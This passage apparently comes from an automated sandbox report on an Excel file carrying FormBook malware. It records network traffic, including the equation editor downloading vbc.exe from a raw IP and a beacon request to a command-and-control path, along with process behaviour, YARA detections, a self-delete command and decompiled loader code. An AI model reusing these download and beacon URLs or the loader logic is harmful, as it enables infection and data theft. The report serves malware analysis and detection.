                                              Oct 13, 2021 19:03:16.877461910 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877481937 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877490997 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877499104 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877506971 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877537012 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877541065 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877543926 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877547026 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877549887 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877552986 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877556086 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877558947 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877562046 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877564907 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.877712011 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877728939 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.877794027 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878082037 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878087044 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878107071 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878109932 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878125906 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878134966 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878142118 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878158092 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878201008 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878217936 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878235102 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878241062 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878251076 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:16.878288031 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.878338099 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:16.879895926 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048145056 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048190117 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048218966 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048238039 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048244953 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048260927 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048264980 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048273087 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048299074 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048305035 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048316002 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048333883 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048338890 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048362017 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048379898 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048391104 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048418045 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048444986 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048470974 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.048707962 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048732996 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048738003 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048742056 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.048746109 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.049011946 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.049065113 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.049129009 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.049166918 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.049417019 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.049432993 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.049434900 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:17.049443007 CEST8049165192.3.110.172192.168.2.22
                                              Oct 13, 2021 19:03:17.049829960 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:03:18.350430965 CEST4916580192.168.2.22192.3.110.172
                                              Oct 13, 2021 19:04:37.381472111 CEST4916780192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:40.386950970 CEST4916780192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:46.393459082 CEST4916780192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:58.710510969 CEST4916880192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:58.729662895 CEST80491683.64.163.50192.168.2.22
                                              Oct 13, 2021 19:04:58.730782032 CEST4916880192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:58.731059074 CEST4916880192.168.2.223.64.163.50
                                              Oct 13, 2021 19:04:58.749098063 CEST80491683.64.163.50192.168.2.22
                                              Oct 13, 2021 19:04:58.749141932 CEST80491683.64.163.50192.168.2.22
                                              Oct 13, 2021 19:04:58.749254942 CEST4916880192.168.2.223.64.163.50

                                              UDP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Oct 13, 2021 19:04:37.338116884 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                                              Oct 13, 2021 19:04:37.364202976 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                                              Oct 13, 2021 19:04:58.681433916 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                                              Oct 13, 2021 19:04:58.704255104 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22

                                              DNS Queries

                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                              Oct 13, 2021 19:04:37.338116884 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.washingtonboatrentals.com | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 19:04:58.681433916 CEST | 192.168.2.22 | 8.8.8.8 | 0xd191 | Standard query (0) | www.washingtonboatrentals.com | A (IP address) | IN (0x0001)

                                              DNS Answers

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                              Oct 13, 2021 19:04:37.364202976 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.washingtonboatrentals.com | | 3.64.163.50 | A (IP address) | IN (0x0001)
                                              Oct 13, 2021 19:04:58.704255104 CEST | 8.8.8.8 | 192.168.2.22 | 0xd191 | No error (0) | www.washingtonboatrentals.com | | 3.64.163.50 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • 192.3.110.172
                                              • www.washingtonboatrentals.com

                                              HTTP Packets

                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              0 | 192.168.2.22 | 49165 | 192.3.110.172 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Timestamp | kBytes transferred | Direction | Data
                                              Oct 13, 2021 19:03:15.651736975 CEST | 0 | OUT | GET /000900/vbc.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 192.3.110.172
                                              Connection: Keep-Alive
                                              Oct 13, 2021 19:03:15.826574087 CEST | 1 | IN | HTTP/1.1 200 OK
                                              Date: Wed, 13 Oct 2021 17:03:16 GMT
                                              Server: Apache/2.4.50 (Win64) OpenSSL/1.1.1l PHP/8.0.11
                                              Last-Modified: Wed, 13 Oct 2021 06:08:09 GMT
                                              ETag: "46f39-5ce35c953b021"
                                              Accept-Ranges: bytes
                                              Content-Length: 290617
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              1 | 192.168.2.22 | 49168 | 3.64.163.50 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Oct 13, 2021 19:04:58.731059074 CEST | 305 | OUT | GET /mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ== HTTP/1.1
                                              User-Agent: Windows Explorer
                                              Host: www.washingtonboatrentals.com
                                              Oct 13, 2021 19:04:58.749141932 CEST | 305 | IN | HTTP/1.1 410 Gone
                                              Server: openresty
                                              Date: Wed, 13 Oct 2021 17:04:57 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Data Ascii: 7<html>9 <head>59 <meta http-equiv='refresh' content='5; url=http://www.washingtonboatrentals.com/' />a </head>9 <body>45 You are being redirected to http://www.washingtonboatrentals.coma </body>8</html>0


                                              Code Manipulations

                                              System Behavior

                                              General

                                              Start time:19:02:29
                                              Start date:13/10/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13fc40000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:19:02:51
                                              Start date:13/10/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:19:02:55
                                              Start date:13/10/2021
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\vbc.exe'
                                              Imagebase:0x400000
                                              File size:290617 bytes
                                              MD5 hash:0031A23B4BB6ABCDCCC5F8122DE5FCB5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 36%, ReversingLabs
                                              Reputation:low

                                              General

                                              Start time:19:02:58
                                              Start date:13/10/2021
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\Public\vbc.exe'
                                              Imagebase:0x400000
                                              File size:290617 bytes
                                              MD5 hash:0031A23B4BB6ABCDCCC5F8122DE5FCB5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:19:03:01
                                              Start date:13/10/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0xffa10000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:19:03:25
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\netsh.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\netsh.exe
                                              Imagebase:0x1640000
                                              File size:96256 bytes
                                              MD5 hash:784A50A6A09C25F011C3143DDD68E729
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:19:03:29
                                              Start date:13/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                                              Imagebase:0x49f30000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis


                                                Executed Functions

                                                C-Code - Quality: 78%
                                                			_entry_() {
                                                				intOrPtr _t47;
                                                				CHAR* _t51;
                                                				char* _t54;
                                                				CHAR* _t56;
                                                				void* _t60;
                                                				intOrPtr _t62;
                                                				int _t64;
                                                				char* _t67;
                                                				char* _t68;
                                                				int _t69;
                                                				char* _t71;
                                                				char* _t74;
                                                				intOrPtr _t87;
                                                				int _t91;
                                                				intOrPtr _t93;
                                                				void* _t95;
                                                				void* _t107;
                                                				intOrPtr* _t108;
                                                				char _t111;
                                                				CHAR* _t116;
                                                				char* _t117;
                                                				CHAR* _t118;
                                                				char* _t119;
                                                				void* _t121;
                                                				char* _t123;
                                                				char* _t125;
                                                				char* _t126;
                                                				void* _t128;
                                                				void* _t129;
                                                				intOrPtr _t138;
                                                				char _t147;
                                                
                                                				 *(_t129 + 0x20) = 0;
                                                				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                				 *(_t129 + 0x1c) = 0;
                                                				 *(_t129 + 0x18) = 0x20;
                                                				SetErrorMode(0x8001); // executed
                                                				if(GetVersion() != 6) {
                                                					_t108 = E00405F28(0);
                                                					if(_t108 != 0) {
                                                						 *_t108(0xc00);
                                                					}
                                                				}
                                                				_t118 = "UXTHEME";
                                                				goto L4;
                                                				while(1) {
                                                					L22:
                                                					_t111 =  *_t56;
                                                					_t134 = _t111;
                                                					if(_t111 == 0) {
                                                						break;
                                                					}
                                                					__eflags = _t111 - 0x20;
                                                					if(_t111 != 0x20) {
                                                						L10:
                                                						__eflags =  *_t56 - 0x22;
                                                						 *((char*)(_t129 + 0x14)) = 0x20;
                                                						if( *_t56 == 0x22) {
                                                							_t56 =  &(_t56[1]);
                                                							__eflags = _t56;
                                                							 *((char*)(_t129 + 0x14)) = 0x22;
                                                						}
                                                						__eflags =  *_t56 - 0x2f;
                                                						if( *_t56 != 0x2f) {
                                                							L20:
                                                							_t56 = E004056B6(_t56,  *((intOrPtr*)(_t129 + 0x14)));
                                                							__eflags =  *_t56 - 0x22;
                                                							if(__eflags == 0) {
                                                								_t56 =  &(_t56[1]);
                                                								__eflags = _t56;
                                                							}
                                                							continue;
                                                						} else {
                                                							_t56 =  &(_t56[1]);
                                                							__eflags =  *_t56 - 0x53;
                                                							if( *_t56 == 0x53) {
                                                								__eflags = (_t56[1] | 0x00000020) - 0x20;
                                                								if((_t56[1] | 0x00000020) == 0x20) {
                                                									_t14 = _t129 + 0x18;
                                                									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
                                                									__eflags =  *_t14;
                                                								}
                                                							}
                                                							__eflags =  *_t56 - 0x4352434e;
                                                							if( *_t56 == 0x4352434e) {
                                                								__eflags = (_t56[4] | 0x00000020) - 0x20;
                                                								if((_t56[4] | 0x00000020) == 0x20) {
                                                									_t17 = _t129 + 0x18;
                                                									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
                                                									__eflags =  *_t17;
                                                								}
                                                							}
                                                							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
                                                							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
                                                								 *((intOrPtr*)(_t56 - 2)) = 0;
                                                								_t57 =  &(_t56[2]);
                                                								__eflags =  &(_t56[2]);
                                                								E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t57);
                                                								L25:
                                                								_t116 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                								GetTempPathA(0x400, _t116);
                                                								_t60 = E004030CA(_t134);
                                                								_t135 = _t60;
                                                								if(_t60 != 0) {
                                                									L27:
                                                									DeleteFileA("1033"); // executed
                                                									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
                                                									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
                                                									if(_t62 != 0) {
                                                										L37:
                                                										E00403511();
                                                										__imp__OleUninitialize();
                                                										_t143 =  *((intOrPtr*)(_t129 + 0x10));
                                                										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
                                                											__eflags =  *0x423fd4; // 0x0
                                                											if(__eflags == 0) {
                                                												L64:
                                                												_t64 =  *0x423fec; // 0xffffffff
                                                												__eflags = _t64 - 0xffffffff;
                                                												if(_t64 != 0xffffffff) {
                                                													 *(_t129 + 0x1c) = _t64;
                                                												}
                                                												ExitProcess( *(_t129 + 0x1c));
                                                											}
                                                											_t126 = E00405F28(5);
                                                											_t119 = E00405F28(6);
                                                											_t67 = E00405F28(7);
                                                											__eflags = _t126;
                                                											_t117 = _t67;
                                                											if(_t126 != 0) {
                                                												__eflags = _t119;
                                                												if(_t119 != 0) {
                                                													__eflags = _t117;
                                                													if(_t117 != 0) {
                                                														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
                                                														__eflags = _t74;
                                                														if(_t74 != 0) {
                                                															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
                                                															 *(_t129 + 0x3c) = 1;
                                                															 *(_t129 + 0x48) = 2;
                                                															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
                                                														}
                                                													}
                                                												}
                                                											}
                                                											_t68 = E00405F28(8);
                                                											__eflags = _t68;
                                                											if(_t68 == 0) {
                                                												L62:
                                                												_t69 = ExitWindowsEx(2, 0x80040002);
                                                												__eflags = _t69;
                                                												if(_t69 != 0) {
                                                													goto L64;
                                                												}
                                                												goto L63;
                                                											} else {
                                                												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
                                                												__eflags = _t71;
                                                												if(_t71 == 0) {
                                                													L63:
                                                													E0040140B(9);
                                                													goto L64;
                                                												}
                                                												goto L62;
                                                											}
                                                										}
                                                										E00405459( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
                                                										ExitProcess(2);
                                                									}
                                                									_t138 =  *0x423f5c; // 0x0
                                                									if(_t138 == 0) {
                                                										L36:
                                                										 *0x423fec =  *0x423fec | 0xffffffff;
                                                										 *(_t129 + 0x1c) = E004035EB( *0x423fec);
                                                										goto L37;
                                                									}
                                                									_t123 = E004056B6(_t125, 0);
                                                									while(_t123 >= _t125) {
                                                										__eflags =  *_t123 - 0x3d3f5f20;
                                                										if(__eflags == 0) {
                                                											break;
                                                										}
                                                										_t123 = _t123 - 1;
                                                										__eflags = _t123;
                                                									}
                                                									_t140 = _t123 - _t125;
                                                									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
                                                									if(_t123 < _t125) {
                                                										_t121 = E004053E0(_t143);
                                                										lstrcatA(_t116, "~nsu");
                                                										if(_t121 != 0) {
                                                											lstrcatA(_t116, "A");
                                                										}
                                                										lstrcatA(_t116, ".tmp");
                                                										_t127 = "C:\\Users\\Public";
                                                										if(lstrcmpiA(_t116, "C:\\Users\\Public") != 0) {
                                                											_push(_t116);
                                                											if(_t121 == 0) {
                                                												E004053C3();
                                                											} else {
                                                												E00405346();
                                                											}
                                                											SetCurrentDirectoryA(_t116);
                                                											_t147 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
                                                											if(_t147 == 0) {
                                                												E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t127);
                                                											}
                                                											E00405B98(0x425000,  *(_t129 + 0x20));
                                                											 *0x425400 = 0x41;
                                                											_t128 = 0x1a;
                                                											do {
                                                												_t87 =  *0x423f50; // 0x601fd8
                                                												E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t87 + 0x120)));
                                                												DeleteFileA(0x41f0f0);
                                                												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
                                                													_t91 = CopyFileA("C:\\Users\\Public\\vbc.exe", 0x41f0f0, 1);
                                                													_t149 = _t91;
                                                													if(_t91 != 0) {
                                                														_push(0);
                                                														_push(0x41f0f0);
                                                														E004058E6(_t149);
                                                														_t93 =  *0x423f50; // 0x601fd8
                                                														E00405BBA(0, _t116, 0x41f0f0, 0x41f0f0,  *((intOrPtr*)(_t93 + 0x124)));
                                                														_t95 = E004053F8(0x41f0f0);
                                                														if(_t95 != 0) {
                                                															CloseHandle(_t95);
                                                															 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                														}
                                                													}
                                                												}
                                                												 *0x425400 =  *0x425400 + 1;
                                                												_t128 = _t128 - 1;
                                                												_t151 = _t128;
                                                											} while (_t128 != 0);
                                                											_push(0);
                                                											_push(_t116);
                                                											E004058E6(_t151);
                                                										}
                                                										goto L37;
                                                									}
                                                									 *_t123 = 0;
                                                									_t124 =  &(_t123[4]);
                                                									if(E0040576C(_t140,  &(_t123[4])) == 0) {
                                                										goto L37;
                                                									}
                                                									E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t124);
                                                									E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t124);
                                                									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                                									goto L36;
                                                								}
                                                								GetWindowsDirectoryA(_t116, 0x3fb);
                                                								lstrcatA(_t116, "\\Temp");
                                                								_t107 = E004030CA(_t135);
                                                								_t136 = _t107;
                                                								if(_t107 == 0) {
                                                									goto L37;
                                                								}
                                                								goto L27;
                                                							} else {
                                                								goto L20;
                                                							}
                                                						}
                                                					} else {
                                                						goto L9;
                                                					}
                                                					do {
                                                						L9:
                                                						_t56 =  &(_t56[1]);
                                                						__eflags =  *_t56 - 0x20;
                                                					} while ( *_t56 == 0x20);
                                                					goto L10;
                                                				}
                                                				goto L25;
                                                				L4:
                                                				E00405EBA(_t118); // executed
                                                				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
                                                				if( *_t118 != 0) {
                                                					goto L4;
                                                				} else {
                                                					E00405F28(0xd);
                                                					_t47 = E00405F28(0xb);
                                                					 *0x423f44 = _t47;
                                                					__imp__#17();
                                                					__imp__OleInitialize(0); // executed
                                                					 *0x423ff8 = _t47;
                                                					SHGetFileInfoA(0x41f4f0, 0, _t129 + 0x38, 0x160, 0); // executed
                                                					E00405B98("kozkonzcvlkexzh Setup", "NSIS Error");
                                                					_t51 = GetCommandLineA();
                                                					_t125 = "\"C:\\Users\\Public\\vbc.exe\" ";
                                                					E00405B98(_t125, _t51);
                                                					 *0x423f40 = GetModuleHandleA(0);
                                                					_t54 = _t125;
                                                					if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
                                                						 *((char*)(_t129 + 0x14)) = 0x22;
                                                						_t54 =  &M0042A001;
                                                					}
